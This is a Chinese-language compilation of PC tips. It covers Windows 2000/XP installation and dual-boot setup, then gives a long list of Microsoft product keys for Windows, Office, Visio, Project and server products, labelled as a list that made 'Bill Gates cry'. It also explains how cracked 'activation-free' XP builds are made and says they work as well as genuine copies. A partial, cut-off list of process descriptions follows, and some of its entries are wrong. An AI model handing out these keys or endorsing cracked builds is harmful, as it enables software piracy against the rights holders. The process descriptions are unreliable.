  Windows XP安装方式包括三种,分别是升级安装、双系统共存安装和全新安装。它的安装方法与Windwos 2000系统安装方法类似,这里就不多做介绍了。

  如果是在DOS方式下安装Windows 2000/XP系统,首先需要运行Smartdrv.exe命令,这样才能使安装程序可以快速地安装,否则等待的时间将是非常漫长的。

  首先,我们用Windows 98启动盘启动电脑进入DOS模式,再执行Smartdrv.exe(如果软盘里没有该文件,可以从Windows 98的安装目录下的Command目录中获取)即可载入。然后执行Windows 2000/XP安装光盘中的i386目录下的Winnt.exe文件,记住:这里不是执行Setup.exe,而是Winnt.exe。以后的操作就比较简单了。

  安装多个操作系统

  在电脑中同时安装Windows 98和Windows 2000系统,可以首先安装Windows 98,然后在Windows 98系统中运行Windows 2000安装程序,这样就可以在计算机启动界面出现多重启动菜单,移动上下光标键并回车后即可选择进入相应的系统了。如果你打算让Windows Me系统与Windows 2000共存,最简单的方法是先安装好Windows Me,然后用Windows 98启动盘或者从光盘启动,安装Windows 2000,安装时选择“全新安装”方式。

  如果你打算让Windows 98、Windows 2000和Windows XP共存,可以首先安装Windows 98,然后在Windows 98下安装Windows 2000系统,最后在Windows 2000下安装Windows XP系统,在完成安装后即可形成多重启动菜单了。

五十、比尔.盖茨哭了——微软全部序列号

WindowsXP可以无限次激活的号码:CXGDD-GP2B2-RKWWD-HG3HY-VDJ7J或者RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
  WindowsXP 2520 Pro 英文版--60天免激活序列号:RK7J8-2PGYQ-P47VV-V6PMB-F6XPQ
  Windows XP 2505 RC1--序列号:DTWB2-VX8WY-FG8R3-X696T-66Y46 Q3R8Y-MP9KD-3M6KB-383YB-7PK9Q 411Y0-URB45-34R3B-310N6-70U51 F0R6R-347JU-57IC3-M0V34-11Z16 50M38-0DY53-7UPU5-7H380-M8111
  WindowXP(windows whistler) Beta2 build 2428--CD Key: RBDC9-VTRC8-D7972-J97JY-PRVMG
  Windows Mellinium(Windows Me)简体中文最终正式版--s/n: B6BYC-6T7C3-4PXRW-2XKWB-GYV33
  Windows2000 Professional 中文版--SN:PQHKR-G4JFW-VTY3P-G4WQ2-88CTW
  Windows2000 Professional英文正式版--s/n: RBDC9-VTRC8-D7972-J97JY-PRVMG
  Windows2000 Server 简体中文完全正式版--S/N:XF7DK-7X2WM-2QRCT-Y9R23-4BHDG
  Windows2000 Server--CD-KEY:H6TWQ-TQQM8-HXJYG-D69F7-R84VM
  Windows 98 SE 标准正式版--s/n: HMTWJ-VPPWP-9BXP8-WD73Y-GGT6M
  Windows98序列号--K4HVD-Q9TJ9-6CRX9-C9G68-RQ2D3
  Microsoft FrontPage 2000 SR-1A V9.0X 中文(简体)完整正式版 S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8
  Microsoft FrontPage 2000 SR-1A V9.0X 中文完整正式版 S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8
  Microsoft Office 2000 DEVELOPER V9.0 SR1(A) 中文旗舰程式开发完整正式版 S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8
  Microsoft Office 2000 Premium V9.0 SR-1 日文完整企业正式版 S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8 OFFICE 2000 Server Extension S/N:4678-0000502
  Microsoft Office 2000 S/N:gc6j3-gtq62-fp876-94fbr-d3dx8
  Microsoft Office 2000 Server Extension S/N:4678-0000502
  Microsoft Office 2000 Sr1 中文企业版 5CD S/N:KY7XV-6PF6K-FQDGJ-4PYQY-QDFYM s/n:Q3PX2-T7Y8Q-8X2VR-PQCTP-YQCYQ S/N:H3X78-Q23HJ-TGT6Q-DK2H4-T2BQ8
  Microsoft Office 2000 STANDARD V9.0 SR-1 日文完整标准正式版 S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8
  Microsoft Office 2000 STANDARD V9.0 SR1(A) S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8
  Microsoft Office 2000 中文企业版 S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8
  Microsoft Office 2000 简体版系列 S/N:GJ627-VB478-VJX8D-CFQGK-JHPG8
  Microsoft Office 2000【3片装】S/N:GJV8J-DRRCG-MVTRJ-G33HM-8BCVM
  Microsoft Office 2001 for Mac Japanese 日文光碟完整正式版 S/N:545-465-4655
  Microsoft Office 2001 For Mac 完整正式版 S/N:545-465-4655
  Microsoft Office 97 日文版 S/N:2601-6686117
  Microsoft Outlook 2000 V9.0 SR-1A 中文完整正式版 S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8
  Microsoft PhotoDraw 2000 中文正式版 S/N:111-1111111
  Microsoft PhotoDraw 2000 日文正式版 S/N:KBTP4-2KJ29-BPWV4-HM6M8-MDJYT
  Microsoft PhotoDraw 2000 第二版 中文版 S/N:KBTP4-2KJ29-BPWV4-HM6M8-MDJYT
  Microsoft PhotoDraw 2000 第二版 日文专业完整正式版 S/N:KBTP4-2KJ29-BPWV4-HM6M8-MDJYT OFFICE 2000 Server Extension S/N:4678-0000502
  Microsoft PROJECT 2000 中文完整正式版 S/N:DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ
  Microsoft PROJECT 2000 中文版 S/N:GC6J3-GTQ62-FP876-94FBR-D3DX8
  Microsoft PROJECT 2000 日文完整正式版 S/N:DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ
  Microsoft PROJECT 2000 简体中文完整正式版 S/N:DT3FT-BFH4M-GYYH8-PG9C3-8K2FJ
  Microsoft SQL Server 2000 中文企业版 S/N:JCYFH-BYJMR-C4PVV-VD9G3-VXDYG
  Microsoft visio 2000 V6.0X ENTERPRISE SR-1 中文顶级企业 SR1 完整正式版 S/N:123165-500133
  Microsoft visio 2000 V6.0X Professional Edition 日文专业完整正式版 S/N:60903-111111
  Microsoft visio 2000 V6.0X Professional SR-1 中文专业 SR1 完整正式版 S/N:60900-111111 or S/N:123035-111111
  Microsoft visio 2000 V6.0X Technical SR-1 Edtion 中文工程 SR1 完整正式版 S/N:123165-500133
  Microsoft Visual Basic V5.0 中文版 S/N:0001-0000000
  Microsoft Visual Foxpro V5.0 S/N:0001-0000000
  Microsoft Visual Studio V6.0 企业完整正式版【6片装】S/N:442-1087991
  Microsoft Whistler Professional Beta 2 2462繁体中文版 S/N:QB2BW-8PJ2D-9X7JK-BCCRT-D233Y
  Microsoft Windows 2000 ADVANCED SERVER WITH SP1 中文完整正式版 CD-KEY:H6TWQ-TQQM8-HXJYG-D69F7-R84VM
  Microsoft Windows 2000 ADVANCED SERVER 日文贩售完整正式版 S/N:RM233-2PRQQ-FR4RH-JP89H-46QYB
  Microsoft Windows 2000 Professional Debug/Checked Build With Service Pack 1 多国语系完整正式版 S/N:DDTPV-TXMX7-BBGJ9-WGY8K-B9GH
  Microsoft Windows 2000 PROFESSIONAL 中文专业正式版 S/N:F6PGG-4YYDJ-3FF3T-R328P-3BXTG伺服机版 JVJDR-KY99G-B8J4C-MKJ69-P8QG3
  Microsoft Windows 2000 PROFESSIONAL 中文专业正式版 S/N:XFD2W-W7VH8-MVC47-KY7DQ-P8Y4J
  Microsoft Windows 2000 PROFESSIONAL 日文贩售专业完整正式版 S/N:RM233-2PRQQ-FR4RH-JP89H-46QYB
  Microsoft Windows 2000 SERVER WITH SP1 中文完整正式版 S/N:H6TWQ-TQQM8-HXJYG-D69F7-R84VM
  Microsoft Windows 2000 SERVER 中文版 S/N:H6TWQ-TQQM8-HXJYG-D69F7-R84VM~JVJDR-KY99G-B8J4C-MKJ69-P8QG3~XFD2W-W7VH8-MVC47-KY7DQ-P8Y4J
  Microsoft Windows 95 OSR2 2.1 中文正式版 CD-KEY:09297-OEM-0021245-57958
  Microsoft Windows 98 Second Edition 第二版 S/N:WHWGP-XDR8Y-GR9X3-863RP-67J2T
  Microsoft Windows ME (Millennium Edition) 中文完整正式版 S/N:TCYV8-G6Q2T-R9BHD-BR8VM-J4B36 or S/N:J7C6X-QC2BH-GGX24-7FQG7-2K398 or S/N:B6BYC-6T7C3-4PXRW-2XKWB-GYV33
  Microsoft Windows ME (Millennium Edition) 日文正式版 S/N:TCJC7-H2QDH-3T7G7-R6RTM-YRK3Y
  Microsoft Windows ME (Millennium Edition) 英文升级贩售完整正式版 S/N:HBTD9-6P338-XT2MV-QBTTF-WPGGB
  Microsoft Windows ME/WIN 98/WIN 98 SP1/WIN 98 SE 4合1中文(繁体)正式 S/N:J7C6X-QC2BH-GGX24-7FQG7-2K398
  Microsoft Windows Millennium B2 V4.90.2438 98 第三版中文完整测试版 S/N:RBDC9-VTRC8-D7972-J97JY-PRVMG
  Microsoft Windows Millennium Edition OEM 98 第三版中文完整版 S/N:B6BYC-6T7C3-4PXRW-2XKWB-GYV33
  Microsoft Windows Millennium V4.90.3000 简体体中文正式零售版 S/N:K9KDJ-3XPXY-92WFW-9Q26K-MVRK8
  Microsoft Windows Millennium 标准版 S/N:J7C6X-QC2BH-GGX24-7FQG7-2K398 随机版 S/N:WRK9F-68JJR-JBFD8-F8KPM-WCK7T RTM版 S/N:B6BYC-6T7C3-4PXRW-2XKWB-GYV33
  Microsoft Windows Whistler Pro CD-Key:F6PGG-4YYDJ-3FF3T-R328P-3BXTG
  Windows Small Business Server 2003 CD-KEY:BBGC6-TXDG9-J9CDW-JXK3R-GTMMB
  PROJECT Server 2003 CD-KEY:DY6WQ-D3FYG-V89BY-8KPG9-8YW9M
  Office Pro 2003 CD-KEY:GWH28-DGCMP-P6RC4-6J4MT-3HFDY
  SHAPEPOINT PORTAL SERVER V2003 cdkey:BBH2G-D2VK9-QD4M9-F63XB-43C33
  Visio 2003,OneNote 2003,Project 2003,OFFICE11-Outlook2003
  CD-KEY:WFDWY-XQXJF-RHRYG-BG7RQ-BBDHM
  win2003 Enterprise Server CD-KEY:QW32K-48T2T-3D2PJ-DXBWY-C6WRJ
  win2003 Standard Server CD-KEY:M6RJ9-TBJH3-9DDXM-4VX9Q-K8M8M
  win2003 Web Server CD-KEY: D42X8-7MWXD-M4B76-MKYP7-CW9FD
  
  你的Winxp是不是原版,一看就知:
  在i386文件夹里有一个eula.txt,最后有一行EULAID,就是你的版本
  OEM:WX.2_PRO_OEM_TW(or.WX.2_PRE_OEM_TW)
  执行:WX.2_PRO_RVL_TW(or.WX.2_PRE_RAL_TW)
  RTL.:WX.4_PRO_RTL_TW
  中文正式版的版本是
  EULAID:WX.4_PRO_RTL_CN
  1.如果是WX.开头是正式版,WB.开头是测试版。
  
  2.如果有_PRE,是家庭版,_PRO是专业版。
  
  3._OEM,_RVL都是需要启动版,_RTL有免启动金钥,就可免启动。
  
  4.光碟标签并无意义,是制作光盘的人自己加加进去的。
  
  5.OEM.版的说明,中文版应是一半中文一半英文,如果全是英文,那就是来自英文的Corporate版(破解)
  
  6.执行(RVL)版的说明全是中文。
  
  7、winxp原版的文件都是2001-9-5 12:00,如果有一个不是,那么!特别是i386\eula.txt这个文件。
  
  8、CD.Label是WXPFPP_EN(英文),WXPFPP.cn(中文)
  
  9、还有其它一堆.OEM免激活、免激活正式版等等的,这些都是.利用.OEM、2600Fre.这些版本+Corpfiles.破解,再烧成可开机光盘的,看它们的CD.Label更是五花八门。
  
  10、目前看到免激活版都是某中文版+英文Corpfiles.做成免激活「Home.Made」企业版(或称大量授权版本),看安装序号便知:FCKGW-RHQQ2-YXRKT-8TG6W-2B7Q8。所以如果你有OEM+Corpfiles.版或是RVL@TW版的话,那就不用急着下载其它版本,看看就好。
  
  不管你用RVL@TW.or.OEM+Corpfiles.or.阿猫阿狗免激活可光盘开机版,用起来都一样好用,前提是作者的功力不是太差,没有乱破解一通。除非你是完美主义者,不然我不认为用起来会和正式版有什么差别。当然,先不论微软会不会耍花招来对付这些海盗的可能性

五十一、操作系统进程描述

system process
进程文件: [system process] or [system process]
进程名称: Windows内存处理系统进程
描述: Windows页面内存管理进程,拥有0级优先。
是否为系统进程: 是
alg.exe
进程文件: alg or alg.exe
进程名称: 应用层网关服务
描述: 这是一个应用层网关服务用于网络共享。
是否为系统进程: 是

csrss.exe
进程文件: csrss or csrss.exe
进程名称: Client/Server Runtime Server Subsystem
描述: 客户端服务子系统,用以控制Windows图形相关子系统。
是否为系统进程: 是

ddhelp.exe
进程文件: ddhelp or ddhelp.exe
进程名称: DirectDraw Helper
描述: DirectDraw Helper是DirectX这个用于图形服务的一个组成部分。
是否为系统进程: 是

dllhost.exe
进程文件: dllhost or dllhost.exe
进程名称: DCOM DLL Host进程
描述: DCOM DLL Host进程支持基于COM对象支持DLL以运行Windows程序。
是否为系统进程: 是

inetinfo.exe
进程文件: inetinfo or inetinfo.exe
进程名称: IIS Admin Service Helper
描述: InetInfo是Microsoft Internet Infomation Services (IIS)的一部分,用于Debug调试除错。
是否为系统进程: 是

internat.exe
进程文件: internat or internat.exe
进程名称: Input Locales
描述: 这个输入控制图标用于更改类似国家设置、键盘类型和日期格式。
是否为系统进程: 是

kernel32.dll
进程文件: kernel32 or kernel32.dll
进程名称: Windows壳进程
描述: Windows壳进程用于管理多线程、内存和资源。
是否为系统进程: 是

lsass.exe
进程文件: lsass or lsass.exe
进程名称: 本地安全权限服务
描述: 这个本地安全权限服务控制Windows安全机制。
是否为系统进程: 是

mdm.exe
进程文件: mdm or mdm.exe
进程名称: Machine Debug Manager
描述: Debug除错管理用于调试应用程序和Microsoft Office中的Microsoft Script Editor脚本编辑器。
是否为系统进程: 是

mmtask.tsk
进程文件: mmtask or mmtask.tsk
进程名称: 多媒体支持进程
描述: 这个Windows多媒体后台程序控制多媒体服务,例如MIDI。
是否为系统进程: 是

mprexe.exe
进程文件: mprexe or mprexe.exe
进程名称: Windows路由进程
描述: Windows路由进程包括向适当的网络部分发出网络请求。
是否为系统进程: 是

msgsrv32.exe
进程文件: msgsrv32 or msgsrv32.exe
进程名称: Windows信使服务
描述: Windows信使服务调用Windows驱动和程序管理在启动。
是否为系统进程: 是

mstask.exe
进程文件: mstask or mstask.exe
进程名称: Windows计划任务
描述: Windows计划任务用于设定继承在什么时间或者什么日期备份或者运行。
是否为系统进程: 是

regsvc.exe
进程文件: regsvc or regsvc.exe
进程名称: 远程注册表服务
描述: 远程注册表服务用于访问在远程计算机的注册表。
是否为系统进程: 是

rpcss.exe
进程文件: rpcss or rpcss.exe
进程名称: RPC Portmapper
描述: Windows 的RPC端口映射进程处理RPC调用(远程模块调用)然后把它们映射给指定的服务提供者。
是否为系统进程: 是

services.exe
进程文件: services or services.exe
进程名称: Windows Service Controller
描述: 管理Windows服务。
是否为系统进程: 是

smss.exe
进程文件: smss or smss.exe
进程名称: Session Manager Subsystem
描述: 该进程为会话管理子系统用以初始化系统变量,MS-DOS驱动名称类似LPT1以及COM,调用Win32壳子系统和运行在Windows登陆过程。
是否为系统进程: 是

snmp.exe
进程文件: snmp or snmp.exe
进程名称: Microsoft SNMP Agent
描述: Windows简单的网络协议代理(SNMP)用于监听和发送请求到适当的网络部分。
是否为系统进程: 是

spool32.exe
进程文件: spool32 or spool32.exe
进程名称: Printer Spooler
描述: Windows打印任务控制程序,用以打印机就绪。
是否为系统进程: 是

spoolsv.exe
进程文件: spoolsv or spoolsv.exe
进程名称: Printer Spooler Service
描述: Windows打印任务控制程序,用以打印机就绪。
是否为系统进程: 是

stisvc.exe
进程文件: stisvc or stisvc.exe
进程名称: Still Image Service
描述: Still Image Service用于控制扫描仪和数码相机连接在Windows。
是否为系统进程: 是

svchost.exe
进程文件: svchost or svchost.exe
进程名称: Service Host Process
描述: Service Host Process是一个标准的动态连接库主机处理服务。
是否为系统进程: 是

system
进程文件: system or system
进程名称: Windows System Process
描述: Microsoft Windows系统进程。
是否为系统进程: 是

taskmon.exe
进程文件: taskmon or taskmon.exe
进程名称: Windows Task Optimizer
描述: windows任务优化器监视你使用某个程序的频率,并且通过加载那些经常使用的程序来整理优化硬盘。
是否为系统进程: 是

tcpsvcs.exe
进程文件: tcpsvcs or tcpsvcs.exe
进程名称: TCP/IP Services
描述: TCP/IP Services Application支持透过TCP/IP连接局域网和Internet。
是否为系统进程: 是

winlogon.exe
进程文件: winlogon or winlogon.exe
进程名称: Windows Logon Process
描述: Windows NT用户登陆程序。
是否为系统进程: 是

winmgmt.exe
进程文件: winmgmt or winmgmt.exe
进程名称: Windows Management Service
描述: Windows Management Service透过Windows Management Instrumentation data (WMI)技术处理来自应用客户端的请求。
是否为系统进程: 是

程序进程

absr.exe
进程文件: absr or absr.exe
进程名称: Backdoor.Autoupder Virus
描述: 这个进程是Backdoor.Autoupder后门病毒程序创建的。
是否为系统进程: 否

acrobat.exe
进程文件: acrobat or acrobat.exe
进程名称: Adobe Acrobat
描述: Acrobat Writer用于创建PDF文档。
是否为系统进程: 否

acrord32.exe
进程文件: acrord32 or acrord32.exe
进程名称: Acrobat Reader
描述: Acrobat Reader是一个用于阅读PDF文档的软件。
是否为系统进程: 否

agentsvr.exe
进程文件: agentsvr or agentsvr.exe
进程名称: OLE automation server
描述: OLE Automation Server是Microsoft Agent的一部分。
是否为系统进程: 否

aim.exe
进程文件: aim or aim.exe
进程名称: AOL Instant Messenger
描述: AOL Instant Messenger是一个在线聊天和即时通讯IM软件客户端。
是否为系统进程: 否

airsvcu.exe
进程文件: airsvcu or airsvcu.exe
进程名称: Microsoft Media Manager
描述: OLE 这是一个用于在硬盘上建立索引文件和文件夹,在Microsoft Media Manager媒体管理启动时运行的进程。它可以在控制面板被禁用。
是否为系统进程: 否

alogserv.exe
进程文件: alogserv or alogserv.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
是否为系统进程: 否

avconsol.exe
进程文件: avconsol or avconsol.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
是否为系统进程: 否

avsynmgr.exe
进程文件: avsynmgr or avsynmgr.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用于扫描你的文档和E-mail中的病毒。
是否为系统进程: 否

backWeb.exe
进程文件: backWeb or backWeb.exe
进程名称: Backweb Adware
描述: Backweb是一个Adware(广告插件,一般是由于安装某些免费软件而伴随安装上的程序)来自Backweb Technologies。
是否为系统进程: 否

bcb.exe
进程文件: bcb or bcb.exe
进程名称: Borland C++ Builder
描述: Borland C++ Builder
是否为系统进程: 否

calc.exe
进程文件: calc or calc.exe
进程名称: Calculator
描述: Microsoft Windows计算器程序
是否为系统进程: 否

ccapp.exe
进程文件: ccapp or ccapp.exe
进程名称: Symantec Common Client
描述: Symantec公用应用客户端包含在Norton AntiVirus 2003和Norton Personal Firewall 2003。
是否为系统进程: 否

cdplayer.exe
进程文件: cdplayer or cdplayer.exe
进程名称: CD Player
描述: Microsoft Windows包含的CD播放器
是否为系统进程: 否

charmap.exe
进程文件: charmap or charmap.exe
进程名称: Windows Character Map
描述: Windows字符映射表用来帮助你寻找不常见的字符。
是否为系统进程: 否

idaemon.exe
进程文件: cidaemon or cidaemon.exe
进程名称: Microsoft Indexing Service
描述: 在后台运行的Windows索引服务,用于帮助你搜索文件在下次变得更快。
是否为系统进程:

cisvc.exe
进程文件: cisvc or cisvc.exe
进程名称: Microsoft Index Service Helper
描述: Microsoft Index Service Helper监视Microsoft Indexing Service (cidaemon.exe) 的内存占用情况,如果cidaemon.exe内存使用超过了40M,则自动重新启动该进程。
是否为系统进程: 否

cmd.exe
进程文件: cmd or cmd.exe
进程名称: Windows Command Prompt
描述: Windows控制台程序。不像旧的command.com,cmd.exe是一个32位的命令行使用在WinNT/2000/XP。
是否为系统进程: 否

cmesys.exe
进程文件: cmesys or cmesys.exe
进程名称: Gator GAIN Adware
描述: Gator GAIN是一个Adware插件(广告插件,一般是由于安装某些免费软件而伴随安装上的程序)。
是否为系统进程: 否

ctfmon.exe
进程文件: ctfmon or ctfmon.exe
进程名称: Alternative User Input Services
描述: 控制Alternative User Input Text Processor (TIP)和Microsoft Office语言条。Ctfmon.exe提供语音识别、手写识别、键盘、翻译和其它用户输入技术的支持。
是否为系统进程: 否

ctsvccda.exe
进程文件: ctsvccda or ctsvccda.exe
进程名称: Create CD-ROM Services
描述: 在Win9X创建CD-ROM访问服务。
是否为系统进程: 否

cutftp.exe
进程文件: cutftp or cutftp.exe
进程名称: CuteFTP
描述: CuteFTP是一个流行的FTP客户端用于从FTP服务器上传/下载文件。
是否为系统进程: 否

defwatch.exe
进程文件: defwatch or defwatch.exe
进程名称: Norton AntiVirus
描述: Norton Anti-Virus扫描你的文件和email以检查病毒。
是否为系统进程: 否

devldr32.exe
进程文件: devldr32 or devldr32.exe
进程名称: Create Device Loader
描述: Creative Device Loader属于Create Soundblaster驱动。
是否为系统进程: 否

directcd.exe
进程文件: directcd or directcd.exe
进程名称: Adaptec DirectCD
描述: Adaptec DirectCD是一个用文件管理器式的界面,烧录文件到光盘的软件。
是否为系统进程: 否

dreamweaver.exe
进程文件: dreamweaver or dreamweaver.exe
进程名称: Macromedia DreamWeaver
描述: Macromedia DreamWeaver是一个HTML编辑器用于创建站点和其它类别的HTML文档。
是否为系统进程: 否

em_exec.exe
进程文件: em_exec or em_exec.exe
进程名称: Logitech Mouse Settings
描述: 这是Logitech MouseWare状态栏图标的进程,用于用户访问控制鼠标属性和察看MouseWare帮助。
是否为系统进程: 否

excel.exe
进程文件: excel or excel.exe
进程名称: Microsoft Excel
描述: Microsoft Excel是一个电子表格程序包括在Microsoft Office中。
是否为系统进程: 否

findfast.exe
进程文件: findfast or findfast.exe
进程名称: Microsoft Office Indexing
描述: Microsoft Office索引程序,用于提高Microsoft Office索引Office文档的速度。
是否为系统进程: 否

frontpage.exe
进程文件: frontpage or frontpage.exe
进程名称: Microsoft FrontPage
描述: Microsoft FrontPage是一个HTML编辑器用于创建站点和其它类别的HTML文档。
是否为系统进程: 否

gmt.exe
进程文件: gmt or gmt.exe
进程名称: Gator Spyware Component
描述: Gator Spyware是一个广告插件,随Gator安装和启动。
是否为系统进程: 否

hh.exe
进程文件: hh or hh.exe
进程名称: Gator Windows Help
描述: Windows Help程序用以打开帮助文件和文档,包括在很多Windows程序中。
是否为系统进程: 否

hidserv.exe
进程文件: hidserv or hidserv.exe
进程名称: Microsoft Human Interface Device Audio Service
描述: 后台服务,用来支持USB音效部件和USB多媒体键盘。
是否为系统进程: 否

QQ.exe
进程文件: QQ or QQ.exe
进程名称: QQ
描述: QQ是一个在线聊天和即时通讯客户端。
是否为系统进程: 否

iexplore.exe
进程文件: iexplore or iexplore.exe
进程名称: Internet Explorer
描述: Microsoft Internet Explorer网络浏览器透过HTTP访问WWW万维网。
是否为系统进程: 否

kodakimage.exe
进程文件: kodakimage or kodakimage.exe
进程名称: Imaging
描述: Kodak Imaging是一个图片察看软件。包括在Windows,用以打开图像文件。
是否为系统进程: 否

loadqm.exe
进程文件: loadqm or loadqm.exe
进程名称: MSN Queue Manager Loader
描述: MSN Queue Manager Loader被随着MSN Explorer和MSN Messenger安装。他在一些时候会占用很多系统资源。
是否为系统进程: 否

loadwc.exe
进程文件: loadwc or loadwc.exe
进程名称: Load WebCheck
描述: Load WebCheck用以定制一些Internet Explorer的设定,添加、删除或者更新用户profiles设定。
是否为系统进程: 否
mad.exe
进程文件: mad or mad.exe
进程名称: System Attendant Service
描述: System Attendant Service是Microsoft Exchange Server的后台程序。它用以读取Microsoft Exchange的DLLs文件,写log信息和生成离线地址薄。
是否为系统进程: 否

mcshield.exe
进程文件: mcshield or mcshield.exe
进程名称: McAfee VirusScan
描述: McAfee VirusScan是一个反病毒软件用以扫描你的文件和email中的病毒。
是否为系统进程: 否

mgabg.exe
进程文件: mgabg or mgabg.exe
进程名称: Matrox BIOS Guard
描述: Matrox BIOS守护进程。
是否为系统进程: 否

mmc.exe
进程文件: mmmc or mmc.exe
进程名称: Microsoft Management Console
描述: Microsoft Management Console管理控制程序集成了很多的系统控制选项。例如设备管理(系统、硬件
)或者计算机权限控制(Administrative管理工具)。
是否为系统进程: 否

mobsync.exe
进程文件: mobsync or mobsync.exe
进程名称: Microsoft Synchronization Manager
描述: Internet Explorer的一个组成部分,用以在后台同步离线察看页面。
是否为系统进程: 否

mplayer.exe
进程文件: mplayer or mplayer.exe
进程名称: Windows Media Player
描述: Windows Media Player是一个用以打开音乐、声音和视频文件的软件。
是否为系统进程: 否

mplayer2.exe
进程文件: mplayer2 or mplayer2.exe
进程名称: Windows Media Player
描述: Windows Media Player是一个用以打开音乐、声音和视频文件的软件。
是否为系统进程: 否

msaccess.exe
进程文件: msaccess or msaccess.exe
进程名称: Microsoft Access
描述: Microsoft Access是一个数据库软件包括在Microsoft Office。
是否为系统进程: 否

msbb.exe
进程文件: msbb or msbb.exe
进程名称: MSBB Web3000 Spyware Application
描述: MSBB Web3000 Spyware是包括在一些adware产品中,利用注册表随Windows启动。
是否为系统进程: 否

msdtc.exe
进程文件: msdtc or msdtc.exe
进程名称: Distributed Transaction Coordinator
描述: Microsoft Distributed Transaction Coordinator控制多个服务器的传输,被安装在Microsoft Personal Web Server和Microsoft SQL Server。
是否为系统进程: 否

msiexec.exe
进程文件: msiexec or msiexec.exe
进程名称: Windows Installer Component
描述: Windows Installer的一部分。用来帮助Windows Installer package files (MSI)格式的安装文件。
是否为系统进程: 否

msimn.exe
进程文件: msimn or msimn.exe
进程名称: Microsoft Outlook Express
描述: Microsoft Outlook Express是一个Email和新闻组客户端包括在Microsoft Windows。
是否为系统进程: 否

msmsgs.exe
进程文件: msmsgs or msmsgs.exe
进程名称: MSN Messenger Traybar Process
描述: MSN Messenger是一个在线聊天和即时通讯客户端。
是否为系统进程: 否

msoobe.exe
进程文件: msoobe or msoobe.exe
进程名称: Windows Product Activation
描述: Windows XP License的Product Activation产品激活程序。
是否为系统进程: 否

mspaint.exe
进程文件: mspaint or mspaint.exe
进程名称: Microsoft Paint
描述: Microsoft Paint画图是一个图像编辑器包括在Microsoft Windows,它能够编辑bmp图像。
是否为系统进程: 否

mspmspsv.exe
进程文件: mspmspsv or mspmspsv.exe
进程名称: WMDM PMSP Service
描述: Windows Media Player 7需要安装的Helper Service。
是否为系统进程: 否

mysqld-nt.exe
进程文件: mysqld-nt or mysqld-nt.exe
进程名称: MySQL Daemon
描述: MySQL Daemon控制访问MySQL数据库。
是否为系统进程: 否

navapsvc.exe
进程文件: navapsvc or navapsvc.exe
进程名称: Norton AntiVirus Auto-Protect Service
描述: Norton Anti-Virus扫描你的文件和email中的病毒。
是否为系统进程: 否

navapw32.exe
进程文件: navapw32 or navapw32.exe
进程名称: Norton AntiVirus Agent
描述: Norton Anti-Virus扫描你的文件和email中的病毒。
是否为系统进程: 否

ndetect.exe
进程文件: ndetect or ndetect.exe
进程名称: ICQ Ndetect Agent
描述: ICQ Ndetect Agent是ICQ用来侦测网络连接的程序。
是否为系统进程: 否

netscape.exe
进程文件: netscape or netscape.exe
进程名称: Netscape
描述: Netscape网络浏览器通过HTTP浏览WWW万维网。
是否为系统进程: 否

notepad.exe
进程文件: notepad or notepad.exe
进程名称: Notepad
描述: Notepad字符编辑器用于打开文档。在Windows中附带。
是否为系统进程: 否

ntbackup.exe
进程文件: ntbackup or ntbackup.exe
进程名称: Windows Backup
描述: Windows备份工具用于备份文件和文件夹。
是否为系统进程: 否

ntvdm.exe
进程文件: ntvdm or ntvdm.exe
进程名称: Windows 16-bit Virtual Machine
描述: Windows Virtual Machine是为了兼容旧的16位Windows和DOS程序而设置的虚拟机。
是否为系统进程: 否

nvsvc32.exe
进程文件: nvsvc32 or nvsvc32.exe
进程名称: NVIDIA Driver Helper Service
描述: NVIDIA Driver Helper Service在NVIDA显卡驱动中被安装。
是否为系统进程: 否

nwiz.exe
进程文件: nwiz or nwiz.exe
进程名称: NVIDIA nView Control Panel
描述: NVIDIA nView控制面板在NVIDA显卡驱动中被安装,用于调整和设定。
是否为系统进程: 否

osa.exe
进程文件: osa or osa.exe
进程名称: Office Startup Assistant
描述: Microsoft Office启动助手,随Windows启动,增强启动、Office字体、命令和Outlook事务提醒等特性。
是否为系统进程: 否

outlook.exe
进程文件: outlook or outlook.exe
进程名称: Microsoft Outlook
描述: Microsoft Outlook是一个Email客户端包括在Microsoft Office。
是否为系统进程: 否

photoshop.exe
进程文件: photoshop or photoshop.exe
进程名称: Adobe Photoshop
描述: Adobe Photoshop是一个图像编辑软件,能够打开和编辑照片和其它更多类型格式的图片。
是否为系统进程: 否

point32.exe
进程文件: point32 or point32.exe
进程名称: Microsoft Intellimouse Monitor
描述: Microsoft Intellimouse Monitor添加一个鼠标设定图标在工具栏。
是否为系统进程: 否

powerpnt.exe
进程文件: powerpnt or powerpnt.exe
进程名称: Microsoft PowerPoint
描述: Microsoft PowerPoint是一个演示软件包括在Microsoft Office。
是否为系统进程: 否

pstores.exe
进程文件: pstores or pstores.exe
进程名称: Protected Storage Service
描述: Microsoft Protected Storage服务控制保密的内容密码。
是否为系统进程: 否

qttask.exe
进程文件: qttask or qttask.exe
进程名称: Quick Time Tray Icon
描述: Quick Time任务栏图标在你运行Quick Time的时候启动。
是否为系统进程: 否

realplay.exe
进程文件: realplay or realplay.exe
进程名称: Real Player
描述: Real Player是一个媒体播放器用来打开和播放音乐、声音和Real Media格式的视频文件。
是否为系统进程: 否

rnaapp.exe
进程文件: rnaapp or rnaapp.exe
进程名称: Windows Modem Connection
描述: Windows Modem连接控制用以控制拨号modem连接。
是否为系统进程: 否

rtvscan.exe
进程文件: rtvscan or rtvscan.exe
进程名称: Norton AntiVirus
描述: Norton Anti-Virus用以扫描你的文件和email中的病毒。
是否为系统进程: 否

rundll32.exe
进程文件: rundll32 or rundll32.exe
进程名称: Windows RUNDLL32 Helper
描述: Windows Rundll32为了需要调用DLLs的程序。
是否为系统进程: 否

sndrec32.exe
进程文件: sndrec32 or sndrec32.exe
进程名称: Windows Sound Recorder
